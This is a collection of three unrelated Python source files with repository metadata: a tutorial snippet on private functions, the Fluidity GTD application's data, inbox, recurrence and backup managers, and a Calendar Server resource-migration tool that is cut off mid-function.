#Private functions and variables "should not" be referenced directly rather than "cannot" be, because Python has no mechanism to completely block access to private functions or variables.
#By programming convention, however, you should not reference private functions or variables.
def _private_1(name):
return 'Hi, %s' % name
def _private_2(name):
return 'Hello, %s' % name
def greating(name):
if len(name)>3:
return _private_1(name)
else:
return _private_2(name)
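# Illustrative usage (an added example, not from the original tutorial):
#   >>> greating('Bob')        # len('Bob') == 3, so _private_2 is used
#   'Hello, Bob'
#   >>> greating('Michael')    # len('Michael') > 3, so _private_1 is used
#   'Hi, Michael'
# "from <this module> import *" would expose greating() but skip the
# underscore-prefixed helpers, which is exactly the encapsulation described below.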
#The module exposes the public greeting() function and hides the internal logic in private functions, so callers of greeting() need not care about the private implementation details; this is a very useful way to encapsulate and abstract code
#Define as private every function that outside code does not need to reference, and make public only the functions that outside code needs. | apache-2.0 | 5,133,151,064,973,818,000 | 29.222222 | 98 | 0.690213 | false
jensck/fluidity | fluidity/managers.py | 1 | 38146 | #-*- coding:utf-8 -*-
#
# Copyright (C) 2012 - Jens Knutson <jens.knutson at gmail dot com>
# This software is licensed under the GNU General Public License
# version 3 or later (see the file COPYING).
#pylint: disable-msg=W0201
"""Collection of "manager" classes, which handle various aspects of Fluidity."""
from __future__ import absolute_import, division, print_function
__author__ = 'Jens Knutson'
try:
import cPickle as pickle
except ImportError:
import pickle
import datetime
import glob
import json
import operator
import os
import shutil
import subprocess
import time
import gio
import gobject
import pango
import yaml
from kiwi.ui.objectlist import Column
from xdg import BaseDirectory
from fluidity import defs
from fluidity import gee_tee_dee
from fluidity import inbox_items
from fluidity import magic_machine
from fluidity import app_utils
from fluidity.first_time import FirstTimeBot
from fluidity.note import ProjectNote
class DataManager(object):
def __init__(self):
self.pickle_path = defs.USER_DATA_MAIN_FILE
#first, make sure we have our data file - if not, invoke FirstTimeBot
if (not os.path.exists(self.pickle_path) or
not os.path.exists(defs.NOTE_SLIDER_FOLDER)):
bot = FirstTimeBot()
bot.create_initial_files_and_paths()
del(bot) # Thank you for your service, bot. Rest in peace.
try:
with open(self.pickle_path, 'r') as pfile:
self.top_data = pickle.load(pfile)
except EOFError:
# probably the main app in the middle of saving its file.
# Wait a couple seconds, then try again.
time.sleep(2)
# If it _still_ fails, something is really screwed - not
# accommodating this, at least not yet.
with open(self.pickle_path, 'r') as pfile:
self.top_data = pickle.load(pfile)
self.aofs = self.top_data['areas_of_focus']
self.prjs = self.top_data['projects']
self.single_notes = self.top_data['single_notes']
self.queued_singletons = self.top_data['queued_singletons']
self._file_toady = FileSystemManager()
self._magic_maker = magic_machine.MagicMachine()
self.rebuild_aof_cache()
# PUBLIC METHODS
def activate_due_queued(self):
app_utils.log_line("Running activate_due_queued()", datetime.datetime.now())
for p in self.prjs:
prj = self.prjs[p]
if prj.status == "queued":
# FIXME: if the status is queued, we should /always/ have a
# queue date. What's the fallback?
if prj.queue_date:
if datetime.date.today() >= prj.queue_date:
self.change_project_status(prj, "active")
for na in self.queued_singletons:
if na.queue_date <= datetime.date.today():
self.prjs['singletons'].next_actions.append(na)
self.queued_singletons.remove(na)
def activate_nas(self, nas, prj_key):
"""Move the given NextActions to the Project's next_actions list"""
project = self.prjs[prj_key]
self.__move_na(nas, project.next_actions,
(project.unordered_next_actions,
project.incubating_next_actions))
def add_na_to_prj(self, na, prj_key):
self.prjs[prj_key].next_actions.append(na)
def add_queued_singleton(self, na):
self.queued_singletons.append(na)
self.save_data()
def aof_names(self):
return [self.aofs[k]['name'] for k in self.aofs.keys()]
def archive_completed_singletons(self):
#FIXME: total crap. fix later.
# the .format("") below is on purpose - look at the path for
# defs.USER_DATA_PATH in your filesystem, it'll make more sense.
pkl_path = os.path.join(defs.USER_DATA_PATH,
defs.ARCHIVED_SINGLETONS_FNAME.format(""))
try:
with open(pkl_path, 'r') as pkl_read:
nas_to_archive = pickle.load(pkl_read)
now = datetime.datetime.now().strftime(
defs.ARCHIVED_SINGLETONS_TIME_TMPLT)
# back up the old data file, just in case...
backup_file_name = defs.ARCHIVED_SINGLETONS_FNAME.format(now)
shutil.copy2(pkl_path, os.path.join(defs.BACKUPS_PATH, backup_file_name))
except IOError:
nas_to_archive = []
singletons = self.prjs['singletons'].next_actions
for na in singletons:
if na.complete:
nas_to_archive.append(na)
for na in nas_to_archive:
if na in singletons:
singletons.remove(na)
with open(pkl_path, 'wb') as pkl_write:
pickle.dump(nas_to_archive, pkl_write, pickle.HIGHEST_PROTOCOL)
self.save_data()
def autosave(self):
# FIXME: ZOMG this is so ghetto-tastic. fix it. srsly.
self.save_data()
return True
def change_project_status(self, prj, new_status, queue_date=None):
self._file_toady.move_project_folder(prj.summary, prj.status, new_status)
prj_ = prj
note = ProjectNote(prj=prj_)
note.change_prj_status(new_status)
if new_status == "queued":
prj.queue_date = queue_date
prj.status = new_status
self.save_data()
def cleanup_before_exit(self):
self.save_data()
def copy_to_project_folder(self, file_name, prj):
self._file_toady.copy_to_project_folder(file_name, prj.summary, prj.status)
def create_new_aof(self, new_name):
key_name = app_utils.format_for_dict_key(new_name)
self.aofs[key_name] = {'name': new_name, 'projects': []}
self.rebuild_aof_cache()
self.save_data()
return self.aofs
def delete_na(self, na, prj):
prj.next_actions.remove(na)
self.save_data()
def delete_prj(self, prj):
app_utils.log_line("Deleting project: " + str(prj), datetime.datetime.now())
# trash the folders first
self._file_toady.trash_project_folder(prj.summary, prj.status)
# then ditch the project notes
prj_ = prj
ProjectNote(prj=prj_).delete()
#this is /almost certainly/ The Hard Way...
for a in self.aofs.keys():
matches = []
# Welcome to my entry in the "Obfuscated Python" contest!
for p in xrange(len(self.aofs[a]['projects'])):
if self.aofs[a]['projects'][p] == prj.key_name:
matches.append({'aof': a, 'p_index': p})
for i in matches:
del(self.aofs[i['aof']]['projects'][i['p_index']])
del(self.prjs[prj.key_name])
self.save_data()
def delete_stuff_note(self, note_obj):
DUHLETED = False
i = 0
while not DUHLETED and i < len(self.single_notes):
if self.single_notes[i]['summary'] == note_obj.summary:
del(self.single_notes[i])
DUHLETED = True
i += 1
def dump_processed_stuff_notes(self, stuff_list):
# cull out the InboxFile items - unneeded.
real_list = []
for stuff in stuff_list:
if not isinstance(stuff, inbox_items.InboxFile):
real_list.append(stuff)
processed_path = \
os.path.join(defs.USER_DATA_PATH,
defs.PROCESSED_STUFF_FILE_NAME + str(time.time()))
with open(processed_path, 'wb') as pfile:
pickle.dump(real_list, pfile, pickle.HIGHEST_PROTOCOL)
gf = gio.File(processed_path)
gf.trash()
def file_stuff_as_read_review(self, stuff, rr_path):
stuff_path = os.path.split(stuff.path)[1]
shutil.move(stuff.path, os.path.join(rr_path, stuff_path))
def get_contexts(self):
contexts = []
for pk in self.prjs.keys():
p = self.prjs[pk]
if p.status == "active":
for na in p.next_actions:
if na.context != "" and na.context != None:
if not na.context in contexts:
contexts.append(na.context)
contexts.sort()
return contexts
def get_file_list_for_prj(self, prj):
return self._file_toady.get_file_list_for_prj(prj.summary, prj.status)
def get_inbox_files(self):
hiddens = os.path.join(defs.INBOX_FOLDER, ".hidden")
if os.path.exists(hiddens):
with open(hiddens, 'r') as dot_hidden:
hidden = dot_hidden.read()
else:
hidden = ""
hidden += "\n".join(defs.IGNORED_INBOX_PATHS)
for file_ in os.listdir(defs.INBOX_FOLDER):
if file_ not in hidden and not file_.startswith('.'):
yield inbox_items.InboxFile(os.path.join(defs.INBOX_FOLDER,
file_))
def get_inbox_notes(self):
return self.single_notes
def get_current_nas_for_each_active_prj(self):
active_nas = []
for p in self.prjs.keys():
prj = self.prjs[p]
if prj.status == "active" and prj.summary != 'singletons':
for na in prj.next_actions:
if not na.complete:
active_nas.append(na)
break
active_nas.extend([na for na in prj.unordered_next_actions
if not na.complete])
for na in self.prjs['singletons'].next_actions:
if not na.complete:
active_nas.append(na)
return active_nas
def get_nas_for_prj(self, prj_key):
try:
return self.prjs[prj_key].next_actions
except AttributeError:
return []
def get_prj_aof_names(self, prj):
aof_list = []
if len(prj.aofs) == 0:
aof_list.append(defs.NO_AOF_ASSIGNED)
else:
for a in prj.aofs:
aof_list.append(self.aofs[a]['name'])
return sorted(aof_list)
def get_prjs_by_aof(self, area, review_filter):
prj_list = []
# "incomplete" is just used by Slider, so far"
if review_filter == "incomplete":
for p in sorted(self.prjs.keys()):
prj = self.prjs[p]
if prj.status != "completed":
prj_list.append(prj)
else:
if area == "All":
prj_list.extend([prj for prj in self.prjs.values() if prj.status == review_filter])
elif area == defs.NO_AOF_ASSIGNED:
for p in sorted(self.prjs.keys()):
prj = self.prjs[p]
if prj.status == review_filter and len(prj.aofs) == 0:
prj_list.append(prj)
else:
area_key = app_utils.format_for_dict_key(area)
if self.aofs[area_key]['projects']:
prj_keys = self.aofs[area_key]['projects']
prj_list.extend([prj for prj in self.prjs.values()
if prj.status == review_filter and prj.key_name in prj_keys])
return sorted(prj_list, key=operator.attrgetter('summary'))
def get_project_folder_uri(self, prj):
return self._file_toady.get_project_folder_uri(prj.summary, prj.status)
def incubate_nas(self, nas, prj_key):
"""Move the given NextActions to the Project's incubating_next_actions."""
project = self.prjs[prj_key]
self.__move_na(nas, project.incubating_next_actions,
(project.next_actions, project.unordered_next_actions))
def move_nas_to_ordered_actions(self, nas, prj_key):
project = self.prjs[prj_key]
self.__move_na(nas, project.next_actions,
(project.unordered_next_actions, project.incubating_next_actions))
def move_nas_to_unordered_actions(self, nas, prj_key):
project = self.prjs[prj_key]
self.__move_na(nas, project.unordered_next_actions,
(project.next_actions, project.incubating_next_actions))
def __move_na(self, nas, add_to, remove_from):
for na in nas:
add_to.append(na)
for na_list in remove_from:
try:
na_list.remove(na)
except ValueError:
# HACK to work around the fact that we don't know which
# list it's coming _from_.
pass
def queue_singleton_na(self, na, queue_date_str):
try:
self.prjs['singletons'].next_actions.remove(na)
na.queue_date = self._magic_maker.get_magic_date(queue_date_str)
self.add_queued_singleton(na)
except ValueError:
# don't freak out if someone tries queuing a NA that isn't in singletons
pass
def rebuild_aof_cache(self):
for aof in self.aofs:
del(self.aofs[aof]['projects'][:])
for prj in self.prjs.keys():
for aof_key in self.prjs[prj].aofs:
if prj not in self.aofs[aof_key]['projects']:
self.aofs[aof_key]['projects'].append(prj)
def remove_file_from_prj(self, file_name, prj):
self._file_toady.remove_from_project_folder(file_name, prj.summary,
prj.status)
def reparent_project(self, prj, new_parent):
"""Make `new_parent` the parent object of `prj`."""
new_parent.subprojects.append(prj.uuid)
prj.parent_project = new_parent.uuid
def save_data(self):
# utils.log_line("Saving main data file.", datetime.datetime.now())
backup_path = os.path.join(defs.BACKUPS_PATH,
defs.USER_DATA_MAIN_FNAME + str(time.time()))
shutil.copy(self.pickle_path, backup_path)
with open(self.pickle_path, 'wb') as pfile:
pickle.dump(self.top_data, pfile, pickle.HIGHEST_PROTOCOL)
return True
def search(self, query, include_completed=False, include_nas=False):
query = query.lower()
formatter = lambda x: "<b>{0}</b>".format(x) # pylint: disable-msg=W0108
results = []
for prj in self.prjs.values():
if include_nas and (include_completed or prj.status != 'completed'):
for na in prj.next_actions:
score = magic_machine.score(na.summary, query)
if score > 0.4:
# fuck me, this is ugly: "flat is better than nested."
summary_formatted = magic_machine.format_common_substrings(
na.summary, query, format_match=formatter)
results.append(
SearchResult(na.summary, summary_formatted,
prj.key_name, score, na.uuid))
if include_completed:
score = magic_machine.score(prj.summary, query)
if score > 0.4:
formatted = magic_machine.format_common_substrings(
prj.summary, query, format_match=formatter)
results.append(SearchResult(prj.summary, formatted,
prj.key_name, score))
else:
if prj.status != 'completed':
score = magic_machine.score(prj.summary, query)
if score > 0.4:
formatted = magic_machine.format_common_substrings(
prj.summary, query,
format_match=formatter)
results.append(SearchResult(prj.summary, formatted,
prj.key_name, score))
results.sort(key=operator.attrgetter('score'), reverse=True)
return results
def set_prj_aofs(self, prj, aof_text):
if aof_text == defs.NO_AOF_ASSIGNED:
del(prj.aofs[:])
        else:
            # clear the existing AOF assignments once, *before* the loop, so
            # multiple parsed AOFs don't wipe each other out
            del(prj.aofs[:])
            for aof in self._parse_aof_text(aof_text):
if prj.key_name not in self.aofs[aof]['projects']:
self.aofs[aof]['projects'].append(prj.key_name)
prj.aofs.append(aof)
self.save_data()
return self.get_prj_aof_names(prj)
def add_slider_items(self, na_list, note_list, queued_list, note_strings):
self._take_these_fucking_nas(na_list)
self._take_these_fucking_notes(note_list)
self._take_these_fucking_queues(queued_list)
for note_str in note_strings:
note = {'summary': note_str, 'details': ""}
self.single_notes.append(note)
# Confirm that we made it to the step of saving
return self.save_data()
def _take_these_fucking_nas(self, na_list):
na_objs = [self._ploader(na_file) for na_file in na_list]
for na in na_objs:
self.prjs[na['prj_key']].next_actions.append(na['na_obj'])
def _take_these_fucking_notes(self, note_list):
note_objs = []
for note in note_list:
note_objs.append(self._ploader(note))
for notey in note_objs:
self.single_notes.append(notey)
def _take_these_fucking_queues(self, queued_list):
q_objs = []
for q_file in queued_list:
q_objs.append(self._ploader(q_file))
for obj in q_objs:
self.queued_singletons.append(obj['na_obj'])
self.activate_due_queued()
def _parse_aof_text(self, atext):
if atext == '':
return [app_utils.format_for_dict_key(defs.NO_AOF_ASSIGNED)]
else:
return [app_utils.format_for_dict_key(atext)]
def _ploader(self, pfile_path):
with open(pfile_path, 'r') as pfile:
pcontent = pickle.load(pfile)
return pcontent
# PROPERTIES
def engage_na_deleter(self, uuid):
"""Find the NA with the UID of uid arg, and delete it."""
for prj in self.prjs.values():
# only look at active projects, since this is for Engage
if prj.status == "active":
for na in prj.next_actions:
if na.uuid == uuid:
prj.next_actions.remove(na)
return True
# uh-oh. we REALLY shouldn't have gotten here.
# FIXME: this ought to throw an exception, really
return False
class FileSystemManager(object):
"""Filesystem manager for Fluidity"""
def __init__(self):
pass
def copy_to_project_folder(self, fname, prj_summary, prj_status):
full_path = self._get_path_for_type(prj_status) + \
self._sanitize_path(prj_summary)
# Does the project folder exist yet? If not, create it. If that fails,
# return False right away.
if not os.path.exists(full_path):
# try creating the right folder. if it fails, return False
if not self._create_project_folder(full_path):
return False
if fname.startswith('/'):
base_name = os.path.split(fname)[1]
else:
base_name = fname
# We got this far; now we can try the copy or move operation - which
# path will need to depend on if fname is a folder or not
if os.path.isdir(fname):
if fname.startswith(defs.INBOX_FOLDER):
shutil.move(fname, os.path.join(full_path, base_name))
else:
shutil.copytree(fname, os.path.join(full_path, base_name))
else:
if fname.startswith(defs.INBOX_FOLDER):
# more Evil(TM)... to be fixed with the signals rewrite
try:
shutil.move(fname, os.path.join(full_path, base_name))
except IOError:
# this might have "completed processing" already,
# so maybe it's in the trash...
base_name = os.path.split(fname)[1]
trash_path = BaseDirectory.xdg_data_home + "/Trash/files"
fname = os.path.join(trash_path, base_name)
shutil.move(fname, os.path.join(full_path, base_name))
else:
shutil.copy(fname, os.path.join(full_path, base_name))
return True
def move_project_folder(self, prj_summary, old_status, new_status):
sanitized_summary = self._sanitize_path(prj_summary)
full_path = self._get_path_for_type(old_status) + sanitized_summary
new_path = self._get_path_for_type(new_status) + sanitized_summary
if os.path.exists(full_path):
if full_path != new_path:
shutil.move(full_path, new_path)
def remove_from_project_folder(self, fname, prj_summary, prj_status):
full_path = os.path.join(self._get_path_for_type(prj_status),
self._sanitize_path(prj_summary), fname)
gf = gio.File(full_path)
gf.trash()
gf = None
del(gf)
def get_project_folder_uri(self, prj_summary, prj_status, create=True):
# this method assumes that if you're asking for the URI, you must want
# there to be a prj folder, so if there isn't one yet, just make one.
# However, if you don't want that, just set 'create' to False
full_path = self._get_path_for_type(prj_status) + \
self._sanitize_path(prj_summary)
if create:
if not os.path.exists(full_path):
# try creating the right folder. if it fails, return False
if not self._create_project_folder(full_path):
return ""
uri = "file://" + full_path
return uri
def get_file_list_for_prj(self, prj_summary, prj_status):
path = self.get_project_folder_uri(prj_summary, prj_status, create=False)
path = path.replace("file://", '')
path += os.sep
if os.path.exists(path):
return [path + f for f in os.listdir(path)]
else:
return []
def trash_project_folder(self, prj_summary, prj_status):
full_path = self._get_path_for_type(prj_status) + \
self._sanitize_path(prj_summary)
if os.path.exists(full_path):
gf = gio.File(full_path)
gf.trash()
gf = None
del(gf)
def _create_project_folder(self, path):
os.mkdir(path)
        return os.path.exists(path)
def _sanitize_path(self, fname):
# I might want to extend this behavior later, which is why I made a custom
# method instead of just doing the raw replacement below each time
return fname.replace('/', '-')
def _get_path_for_type(self, prj_status):
if prj_status == "active":
return defs.ACTIVE_FOLDER + os.sep
elif prj_status == "queued":
return defs.QUEUED_FOLDER + os.sep
elif prj_status == "waiting_for":
return defs.WAITING_FOR_FOLDER + os.sep
elif prj_status == 'incubating':
return defs.INCUBATING_FOLDER + os.sep
elif prj_status == 'completed':
return defs.COMPLETED_FOLDER + os.sep
class InboxManager(object):
# CHOCK FULL OF PROFANITY! I'm a juvenile, easily frustrated asshole.
# Get used to it.
def __init__(self, caller, obj_tree, fucdkingdatamanager):
# I also write shitty code, get used to that, too.
self._caller = caller
self._tree = obj_tree
self._fsm = FileSystemManager()
self.dm = fucdkingdatamanager
col = [Column('summary', data_type=str, searchable=True,
ellipsize=pango.ELLIPSIZE_END, expand=True),]
self._tree.set_columns(col)
self._fill_rows()
self._tree.set_headers_visible(False)
# automagically import new Slider items
inbox_monitor = gio.File(defs.NOTE_SLIDER_FOLDER).monitor_directory()
inbox_monitor.connect('changed', self.process_slider_inbox_changes)
def _fill_rows(self):
# FIXME: fix this FFS, use some actual polymorphism
#FIXME: reenable these later
self._row_inbox_folder = CategoryRow("Inbox Folder")
# self._row_email_inbox = CategoryRow("Emails")
# i.e.: Tomboy, e-d-s inbox "tasks", & collected items from Slider
self._row_single_notes = CategoryRow("Single notes")
self._row_processed_stuff = CategoryRow("Processed Stuff")
#FIXME: and re-enable these , too.
self._tree.append(None, self._row_inbox_folder)
# self._tree.append(None, self._row_email_inbox)
self._tree.append(None, self._row_single_notes)
self._tree.append(None, self._row_processed_stuff)
def add_actual_shit_to_columns(self):
notes = self.dm.get_inbox_notes()
notes.sort(key=operator.itemgetter('summary'))
# FIXME: this clears everything in "Processed Stuff", and it probably
# shouldn't - that should live in its own method.
self._tree.clear()
self._fill_rows()
for note in notes:
self._tree.append(self._row_single_notes,
inbox_items.InboxNote(note['summary'], note['details']))
for file_ in sorted(self.dm.get_inbox_files(),
key=operator.attrgetter('summary')):
self._tree.append(self._row_inbox_folder, file_)
# def add_inbox_files_to_clarify(self):
# note, file_, files = None, None, None
# for file_ in files:
# self._tree.append(self._row_single_notes,
# inbox_items.InboxNote(note['summary'], note['details']))
def complete_processing(self, obj):
# FIXME: wtf is this doing in here? this is GUI shit!
if isinstance(obj, inbox_items.InboxStuff):
selected_row = self._tree.get_selected_row_number()
self._tree.remove(obj)
self._tree.append(self._row_processed_stuff, obj)
if isinstance(obj, inbox_items.InboxNote):
self.dm.delete_stuff_note(obj)
elif isinstance(obj, inbox_items.InboxFile):
try:
obj.trash()
except gio.Error as error:
msg = ("Can't trash file (called from InboxManager."
"complete_processing): {0} -- error: {1}")
app_utils.log_line(msg.format(obj.summary, error))
self._tree.refresh()
self._tree.select_paths((selected_row, 0))
gobject.idle_add(self._tree.grab_focus)
def gather_slider_items(self):
na_list = []
note_list = []
queued_list = []
filenames = [os.path.join(defs.NOTE_SLIDER_FOLDER, f)
for f in os.listdir(defs.NOTE_SLIDER_FOLDER)
if f.endswith('.pkl')]
for n in filenames:
if n.endswith('-note.pkl'):
note_list.append(n)
elif n.endswith('-na.pkl'):
na_list.append(n)
elif n.endswith("-queued_na.pkl"):
queued_list.append(n)
gtasks_note_strings = self._import_google_tasks_inbox()
# only delete the actual files if we got confirmation that
# the data from them was saved successfully
if self.dm.add_slider_items(na_list, note_list, queued_list, gtasks_note_strings):
for f in note_list + na_list + queued_list:
gio.File(f).trash()
def _import_google_tasks_inbox(self):
# Yep, hardcoded paths specific to my machine. This is all temporary throwaway code now, so IDGAF
gtasks_raw_output = subprocess.check_output(["python3", "/home/jensck/Code/TasksSample/tasks_test.py"])
notes_list = json.loads(gtasks_raw_output)
return notes_list
def process_slider_inbox_changes(self, gfile_mon, gfile, other_file, event): # IGNORE:W0613
if event.value_nick == 'changes-done-hint':
self.gather_slider_items()
self.add_actual_shit_to_columns()
class RecurrenceManager(object):
def __init__(self, dm):
self._data_lumbergh = dm
def place_recurring_tasks(self):
app_utils.log_line("Running place_recurring_tasks()", datetime.datetime.now())
self._load_data(defs.RECURRENCE_DATA)
data = self._recur_data
today = datetime.date.today()
if self._recur_data['last_run'] < today:
self._place_daily_tasks(today, data)
self._place_monthly_tasks(today, data)
self._place_weekly_tasks(today, data)
self._recur_data['last_run'] = today
self._save_data(defs.RECURRENCE_DATA)
def _create_na(self, task):
na = gee_tee_dee.NextAction(task['summary'])
na_attrs = ('priority', 'context', 'notes', 'url', 'time_est',
'energy_est')
for attr in na_attrs:
if attr in task:
na.__setattr__(attr, task[attr])
if 'due_date' in task:
na.due_date = datetime.date.today() + \
datetime.timedelta(task['due_date'])
return na
# everyXDays: 1 # integer
#- summary: # the task's description in e-d-s
# priority: # "gnite syntax": ! and + are high, - is low, blank is normal
# context: # String, enclosed in quotes
# notes: # probably ought to be a block I guess. until then, string.
# url: # url, enclosed in quotes
# due_date: # integer - X days after placement
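    # A minimal illustrative sketch of a recurrence data file matching the
    # fields used below (all values here are made up, not from a real config):
    #
    #   last_run: 2011-01-01
    #   daily:
    #     - summary: Empty inboxes
    #       everyXDays: 1
    #       context: "@computer"
    #   weekly:
    #     - summary: Weekly review
    #       weekdays: [4]
    #   monthly:
    #     - summary: Pay rent
    #       days: [1]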
def _load_data(self, data_file_path):
self._recur_data = None
self._recur_data = self._yloader(data_file_path)
# FIXME: datamanager is a fucking mess. clean it up.
self._singleton_nas = self._data_lumbergh.get_nas_for_prj('singletons')
def _place_daily_tasks(self, today, data):
for t in data['daily']:
if 'last_seen' not in t:
na = self._create_na(t)
self._data_lumbergh.add_na_to_prj(na, 'singletons')
t['last_seen'] = today
else:
delta = datetime.timedelta(t['everyXDays'])
found = False
index = 0
while found == False and index < len(self._singleton_nas):
if self._singleton_nas[index].summary == t['summary']:
if not self._singleton_nas[index].complete:
found = True
t['last_seen'] = today
index += 1
if found == False and today >= t['last_seen'] + delta:
na = self._create_na(t)
self._data_lumbergh.add_na_to_prj(na, 'singletons')
t['last_seen'] = today
def _place_monthly_tasks(self, today, data):
last = data['last_run']
for t in data['monthly']:
for day in t['days']:
# FIXME: make more generic wrt weekly tasks, too.
task_date = datetime.date(today.year, today.month, day)
if last < task_date <= today:
found = False
index = 0
while found == False and index < len(self._singleton_nas):
if self._singleton_nas[index].summary == t['summary']:
if not self._singleton_nas[index].complete:
found = True
index += 1
if found == False:
na = self._create_na(t)
self._data_lumbergh.add_na_to_prj(na, 'singletons')
def _place_weekly_tasks(self, today, data):
for t in data['weekly']:
for day in t['weekdays']:
# FIXME: make more generic wrt weekly tasks, too.
if day == today.weekday():
# FIXME: bah, I suck. make this work properly when we haven't run
# on a given day, make it run everything since the last time we ran.
# the following should help I guess...
# (today + datetime.timedelta(7 - (today - last_day).days)).weekday()
found = False
index = 0
while found == False and index < len(self._singleton_nas):
if self._singleton_nas[index].summary == t['summary']:
if not self._singleton_nas[index].complete:
found = True
index += 1
if found == False:
na = self._create_na(t)
self._data_lumbergh.add_na_to_prj(na, 'singletons')
def _save_data(self, data_file_path):
#FIXME: create a backup copy?
with open(data_file_path, 'w') as yfile:
print("Saving recurrence data")
yaml.dump(self._recur_data, yfile, Dumper=defs.YAML_DUMPER,
default_flow_style=False)
def _yloader(self, yfile_path):
with open(yfile_path, 'r') as yfile:
print("calling yaml.load()")
ycontent = yaml.load(yfile, Loader=defs.YAML_LOADER)
return ycontent
class BackupJesus(object):
"""BackupJesus saaaaaaaaaaaves the righteous among thy backup files from the
fiery damnation of the void which is /dev/null!
(Actually, /dev/null has nothing to do with this code actually, I just
use gio.File.delete(), but that wouldn't be as funny. ;P)
"""
BACKUPS_PATH = defs.BACKUPS_PATH
FITY_EPOCH = defs.FITY_EPOCH
def __init__(self):
self.now = datetime.datetime.now()
# I'm lazy.
delta = datetime.timedelta
self.backup_policies = (# First four hours of *all* backups
{'start_time': self.now - delta(hours=4),
'end_time': self.now,
'interval': delta(0)},
# every hour of the past week
{'start_time': self.now - delta(weeks=1),
'end_time': self.now - delta(hours=4),
'interval': delta(hours=1)},
# every day of the past month
{'start_time': self.now - delta(weeks=4),
'end_time': self.now - delta(weeks=1),
'interval': delta(1)},
# every month since Fluidity's "epoch"
{'start_time': datetime.datetime.fromtimestamp(
defs.FITY_EPOCH),
'end_time': self.now - delta(weeks=4),
'interval': delta(weeks=4)})
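        # Read together (roughly): every backup from the last four hours is
        # kept; beyond that, only the first backup of each hour survives for a
        # week, only the first of each day survives for a month, and only the
        # first of each four-week window survives back to FITY_EPOCH.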
def kill_stale_backups(self, dry_run=False):
pattern = os.path.join(defs.BACKUPS_PATH, 'fluidity*.pkl*')
kill_list = sorted(glob.glob(pattern))
the_book_of_life = []
for policy in self.backup_policies:
the_book_of_life += self._find_saved_indexes(kill_list, **policy)
the_book_of_life.sort()
doomed = self._delete_doomed_files(kill_list, the_book_of_life, dry_run)
elderly = [d for d in sorted(doomed) if self._is_senior_citizen(d)]
message = "Damned {0} backups to the void; {1} were senior citizens."
app_utils.log_line(message.format(len(doomed), len(elderly)),
datetime.datetime.now())
def _delete_doomed_files(self, klist, saved_indexes, keep_the_safety_on):
doomed = []
for idx, victim in enumerate(klist):
if idx not in saved_indexes:
doomed.append(self._get_creation_time(victim))
if not keep_the_safety_on:
gfile = gio.File(victim)
gfile.trash()
return doomed
def _find_saved_indexes(self, klist, start_time, end_time, interval):
saved = []
for idx, backup_file in enumerate(klist):
creation_time = self._get_creation_time(backup_file)
if start_time < creation_time < end_time:
saved.append(idx)
start_time = creation_time + interval
return saved
def _get_creation_time(self, path):
file_name = path.replace(defs.BACKUPS_PATH + '/', '')
time_float = float(file_name.replace('fluidity.pkl', ''))
return datetime.datetime.fromtimestamp(time_float)
def _is_senior_citizen(self, dt):
return dt < datetime.datetime.now() - datetime.timedelta(weeks=9)
class CategoryRow(object):
def __init__(self, summary):
self.summary = summary
class SearchResult(object):
"""Simple "row" class for use with Kiwi's ObjectList"""
def __init__(self, summary, summary_formatted, prj_key, score, na_uuid=None):
"""Initialize this SearchResult.
Args:
summary: a plain-text string of the result content
summary_formatted: a string formatted with pango markup
prj_key: ...I can't even remember what this does anymore. FML.
score: the 'score' returned by the relevance module
na_uuid: if this is a NextAction, give its uuid so we can jump to it;
defaults to None
"""
self.summary = summary
self.prj_key = prj_key
self.score = score
self.summary_formatted = summary_formatted
self.na_uuid = na_uuid
if self.na_uuid:
self.result_type = "na"
self.result_type_formatted = "<i>Next Action</i>"
else:
self.result_type = "prj"
self.result_type_formatted = "<i>Project</i>"
| gpl-3.0 | -1,707,985,159,558,534,700 | 40.826754 | 111 | 0.554055 | false |
macosforge/ccs-calendarserver | calendarserver/tools/resources.py | 1 | 4349 | #!/usr/bin/env python
##
# Copyright (c) 2006-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from __future__ import print_function
__all__ = [
"migrateResources",
]
from getopt import getopt, GetoptError
import os
import sys
from calendarserver.tools.cmdline import utilityMain, WorkerService
from twext.python.log import Logger
from twisted.internet.defer import inlineCallbacks, returnValue
from txdav.who.directory import CalendarDirectoryRecordMixin
from twext.who.directory import DirectoryRecord as BaseDirectoryRecord
from txdav.who.idirectory import RecordType
log = Logger()
class ResourceMigrationService(WorkerService):
@inlineCallbacks
def doWork(self):
try:
from txdav.who.opendirectory import (
DirectoryService as OpenDirectoryService
)
except ImportError:
returnValue(None)
sourceService = OpenDirectoryService()
sourceService.recordType = RecordType
destService = self.store.directoryService()
yield migrateResources(sourceService, destService)
def usage(e=None):
    if e:
        print(e)
        print("")
    name = os.path.basename(sys.argv[0])
print("usage: %s [options] " % (name,))
print("")
print(" Migrates resources and locations from OD to Calendar Server")
print("")
print("options:")
print(" -h --help: print this help and exit")
print(" -f --config <path>: Specify caldavd.plist configuration path")
print(" -v --verbose: print debugging information")
print("")
    if e:
        sys.exit(64)
    sys.exit(0)
def main():
try:
(optargs, _ignore_args) = getopt(
sys.argv[1:], "hf:", [
"help",
"config=",
],
)
except GetoptError, e:
usage(e)
#
# Get configuration
#
configFileName = None
verbose = False
for opt, arg in optargs:
if opt in ("-h", "--help"):
usage()
elif opt in ("-f", "--config"):
configFileName = arg
else:
raise NotImplementedError(opt)
utilityMain(configFileName, ResourceMigrationService, verbose=verbose)
class DirectoryRecord(BaseDirectoryRecord, CalendarDirectoryRecordMixin):
pass
@inlineCallbacks
def migrateResources(sourceService, destService, verbose=False):
"""
Fetch all the locations and resources from sourceService that are not
already in destService and copy them into destService.
"""
destRecords = []
for recordType in (
RecordType.resource,
RecordType.location,
):
records = yield sourceService.recordsWithRecordType(recordType)
for sourceRecord in records:
destRecord = yield destService.recordWithUID(sourceRecord.uid)
if destRecord is None:
if verbose:
print(
"Migrating {recordType} {uid}".format(
recordType=recordType.name,
uid=sourceRecord.uid
)
)
fields = sourceRecord.fields.copy()
fields[destService.fieldName.recordType] = destService.recordType.lookupByName(recordType.name)
# Only interested in these fields:
fn = destService.fieldName
interestingFields = [
fn.recordType, fn.shortNames, fn.uid, fn.fullNames, fn.guid
]
for key in fields.keys():
if key not in interestingFields:
del fields[key]
